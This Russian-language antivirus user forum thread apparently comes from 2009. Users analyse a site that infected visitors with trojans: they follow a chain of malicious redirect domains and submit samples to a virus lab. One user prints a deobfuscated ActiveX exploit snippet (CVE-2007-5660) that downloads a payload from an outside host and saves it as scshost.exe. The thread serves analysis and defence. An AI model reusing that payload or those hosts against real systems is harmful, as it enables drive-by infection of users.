22 ответов в этой теме

[arz]

Здравствуйте,

на компьютер попал контент с указанного в топике сайта.
Балун с названием вируса и предупреждением выскочил, но при этом куча соединение с почтовыми серверами, через некоторое время перестает работать сеть, из браузера пропал гугл тулбар. Компьютер зависает.
В процессах появилось имяпользователя.exe, позже из контакт листа icq стали приходить сообщения , что от меня идет спам с рекламой какого-то сайта.

Вопрос: антивирус в комплекте av-desk его таки лечит\понимает или нет?

[pig]

Общие сведения
Для начала - видимый в процессах файл найдите и проверьте в онлайне. Если не определяется, засылайте в лабораторию (ссылка вверху).

[Alexander Goryachev]

Общие сведения
Для начала - видимый в процессах файл найдите и проверьте в онлайне. Если не определяется, засылайте в лабораторию (ссылка вверху).

Если человек отослал его экземпляр, то значит обновляют часто, редиски.

Сейчас через Netscape открыл сайт. Показало, Что якобы forbidden. А само потихоньку сайты какие-то подгружало, открылся Acrobat reader. Я его прибил, конечно. Видать, там эксплойт новый под Acrobat.
И на тебе - фаервол спрашивает, разрешить ли запуск e78flw от имени svchost из system32. Файлик нашел в процессах и в каталоге пользователя. Не детектится.
Запретил запуск - процесс пропал, файл остался.
Заслал в вирлаб. Тикет #746309.

[account has been deleted]

Сейчас через Netscape открыл сайт. Показало, Что якобы forbidden. А само потихоньку сайты какие-то подгружало, открылся Acrobat reader. Я его прибил, конечно. Видать, там эксплойт новый под Acrobat.

Видать уже не новый.

И на тебе - фаервол спрашивает, разрешить ли запуск e78flw от имени svchost из system32. Файлик нашел в процессах и в каталоге пользователя. Не детектится.
Запретил запуск - процесс пропал, файл остался.
Заслал в вирлаб. Тикет #746309.

Новый тут

[Alexander Goryachev]

Заслал в вирлаб. Тикет #746309.

Хм. Пришел ответ:
Ваш запрос был проанализирован Автоматической Системой. Данный вирус был добавлен в вирусную базу Dr.Web ®
Вирус: Trojan.Botnetlog.1

А он ни с последними обновлениями, ни на онлайн-проверке не ловится.
И ведь на updates есть три записи.
Подожду следующего обновления, а потом, если не будер ловиться, напишу по тикету в вирлаб...

[account has been deleted]

А он ни с последними обновлениями, ни на онлайн-проверке не ловится.
И ведь на updates есть три записи.
Подожду следующего обновления, а потом, если не будер ловиться, напишу по тикету в вирлаб...

Дак Вам что к спеху? и так доброе дело сделали, обычно через час два в базы пользователей приходит, но если учесть что выходные, может быть и дольше. http://forum.drweb.com/public/style_emoticons/default/rolleyes.gif

ЗЫ Гг.. главно что уже ето, не троян, у кучка хлама в карантине.

[Andrey_Kr]

Заслал в вирлаб. Тикет #746309.

Хм. Пришел ответ:
Ваш запрос был проанализирован Автоматической Системой. Данный вирус был добавлен в вирусную базу Dr.Web ®
Вирус: Trojan.Botnetlog.1

А он ни с последними обновлениями, ни на онлайн-проверке не ловится.
И ведь на updates есть три записи.
Подожду следующего обновления, а потом, если не будер ловиться, напишу по тикету в вирлаб...

ну так если на live зайти , то видно, что эта запись в процессе тестирования

[Alexander Goryachev]

Дак Вам что к спеху? и так доброе дело сделали, обычно через час два в базы пользователей приходит, но если учесть что выходные, может быть и дольше.

Да не, похоже, его еще до того, как я отправил, уже сцапали.

ЗЫ Гг.. главно что уже ето, не троян, у кучка хлама в карантине.

Ну, у меня Гейт пока не проверяет. А там случай интересный. Спайдером ловится только если по прямому url ( который у Вас на скриншоте) грузить в Downlad Master'е, например. Если в браузере, то фиг. Грузится троян и запускается. Вот и тороплюсь, нервничаю.

---------
О, вышло обновление. Прекрасно, теперь ловится. http://forum.drweb.com/public/style_emoticons/default/smile.png
Пойду лечиться. Похоже, не просто так троян запускался. В system32 при приеме-передаче почты в Office Outlook Спайдер нашел dll'ку с этим трояном.

[Alexander Goryachev]

ну так если на live зайти , то видно, что эта запись в процессе тестирования

Ну так сейчас да. А тогда-то еще не было.

[Malex]

Marsell.ws после расшифровки себя ведёт на 
хттп://winesamile.cn/template.html

где находится 2 точно таких же закриптованных скриптов... ладно думаю... и их расшифруем...

первый после расшифровки указал на 
хттп://winesamile.cn/top10.html

второй после расшифровки указал на
хттп://whitebiz.cn/euro/index.php
... и оказался недоступным... 

хттп://winesamile.cn/top10.html
даёт такой же зашифрованный скрипт... и тут не поленился и расшифровал... получил на выходе ссылку сюда
хттп://papampam.net/in.cgi?pipka3, который меня редиректнул на
хттп://portulote.com/pages.html, в котором уже в обычно виде загружается два ифрейма

первый - хттп://portulote.com/cache/index.php
второй - хттп://dornaboret.com/cache/index.php

первый выдал ручную ошибку о ненайденном документе
второй уже банально вернул 404.

В чём моя ошибка? Что я делал не так? (((

Сообщение было изменено Borka: 03 Январь 2009 - 21:58
отредактированы ссылки

[Andrey_Kr]

здесь были ссылки на вредоносное ПО

[Malex]

Вот такой вот загадочный зверь. Спасибо.

[mrbelyash]

Граждане,одумайтесь...Зачем же вы ссылочки то вставляете?

[Andrey_Kr]

Граждане,одумайтесь...Зачем же вы ссылочки то вставляете?

Ну так самая главная ссылка тут в названии темы

[Aleksandr]

Почему он-лайн проверка на вирусы ничего не находит ни по адресу xttр://arsenal-club.com/, ни по xttр://f.5traff.cn/?
А когда заходишь на xttр://arsenal-club.com/ выходит следующее предупреждение если его принять то на комп загружается XPAntivirus2008 и прочий набор вирусов и это при активном SpiderGuard 4.44!

Прикрепленные файлы:

•  f.5traff.cn.JPG   112,54К   105 Скачано раз

[account has been deleted]

Aleksandr

предупреждение если его принять то на комп загружается XPAntivirus2008 и прочий набор вирусов и это при активном SpiderGuard 4.44!

А отвергнуть его не сутьпа?, подумать, а с фига ли к нам Бояре, в гости понаехали, фаервол поставить, перейти на 5, в наше время антивирус в одно лицо не способен устоять, да и вирусо-писатили тоже не дураки.
ЗЫ Нужен комплекс мер по защите вашего ПК. Рупь за сто сайт взломан.....

Aleksandr

Почему он-лайн проверка на вирусы ничего не находит ни по адресу xttр://arsenal-club.com/, ни по xttр://f.5traff.cn/?

Много раз обсуждалось, прячут, редиректят, подменяют, было бы так все просто.......

ЗЫ Я на своем фтр, сертификат имею для FTPS, лично заполнял от фонаря адреса тп, который потом работает как ключь, для шифрованного трафика который кстати не просмотриш, пока сам браузер принятым сертификатом его не расшифрует, имхо наличие оного ни чего не гарантирует.

[Malex]

Скрипт после декрипта принимает следующий вид

<OBJECT id=__i01W height=0 width=0 classid=clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF></OBJECT>
__i01W[DownloadAndExecute]("pow", {11111111-1111-1111-1111-111111111111}, 0, "[cens]tp://f.5traff.cn/load/D15E93/mvflex", "scshost.exe")

Брешь присутствует в файле isusweb.dll (который как раз и идентифицируется как clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF), который через процедуру DownloadAndExecute выполняет скачивание и обработку удалённых объектов.

Файл скачивается с [cens]tp://f.5traff.cn/load/D15E93/mvflex и судя по всему переименовывается в scshost.exe
mvflex на текущий момент через вирустотал выглядит так:

eSafe 7.0.17.0 2009.01.06 Suspicious File
Sunbelt 3.2.1809.2 2008.12.22 Trojan-Downloader.Win32.Web!cobra (v)
TrendMicro 8.700.0.1004 2009.01.07 PAK_Generic.001

Где-то вот так

[Malex]

Собственно в дополнение описание уязвимости:
хттп://www.ciac.org/ciac/bulletins/r-157.shtml
хттп://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5660"

Тикет #750460

[Aleksandr]

Скрипт после декрипта принимает следующий вид

<OBJECT id=__i01W height=0 width=0 classid=clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF></OBJECT>
__i01W[DownloadAndExecute]("pow", {11111111-1111-1111-1111-111111111111}, 0, "[cens]tp://f.5traff.cn/load/D15E93/mvflex", "scshost.exe")

Брешь присутствует в файле isusweb.dll (который как раз и идентифицируется как clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF), который через процедуру DownloadAndExecute выполняет скачивание и обработку удалённых объектов.

Файл скачивается с [cens]tp://f.5traff.cn/load/D15E93/mvflex и судя по всему переименовывается в scshost.exe
mvflex на текущий момент через вирустотал выглядит так:

eSafe 7.0.17.0 2009.01.06 Suspicious File
Sunbelt 3.2.1809.2 2008.12.22 Trojan-Downloader.Win32.Web!cobra (v)
TrendMicro 8.700.0.1004 2009.01.07 PAK_Generic.001

Где-то вот так

молодец, Разбираешься в сайтах.
Короче админ сайта бабло рубит на рассаднике вирусов!

[Malex]

Скрипт после декрипта принимает следующий вид

<OBJECT id=__i01W height=0 width=0 classid=clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF></OBJECT>
__i01W[DownloadAndExecute]("pow", {11111111-1111-1111-1111-111111111111}, 0, "[cens]tp://f.5traff.cn/load/D15E93/mvflex", "scshost.exe")

Брешь присутствует в файле isusweb.dll (который как раз и идентифицируется как clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF), который через процедуру DownloadAndExecute выполняет скачивание и обработку удалённых объектов.

Файл скачивается с [cens]tp://f.5traff.cn/load/D15E93/mvflex и судя по всему переименовывается в scshost.exe
mvflex на текущий момент через вирустотал выглядит так:

eSafe 7.0.17.0 2009.01.06 Suspicious File
Sunbelt 3.2.1809.2 2008.12.22 Trojan-Downloader.Win32.Web!cobra (v)
TrendMicro 8.700.0.1004 2009.01.07 PAK_Generic.001

Где-то вот так

молодец, Разбираешься в сайтах.
Короче админ сайта бабло рубит на рассаднике вирусов!

Скорей всего сайт просто завирусован. Врядли на этом можно делать деньги.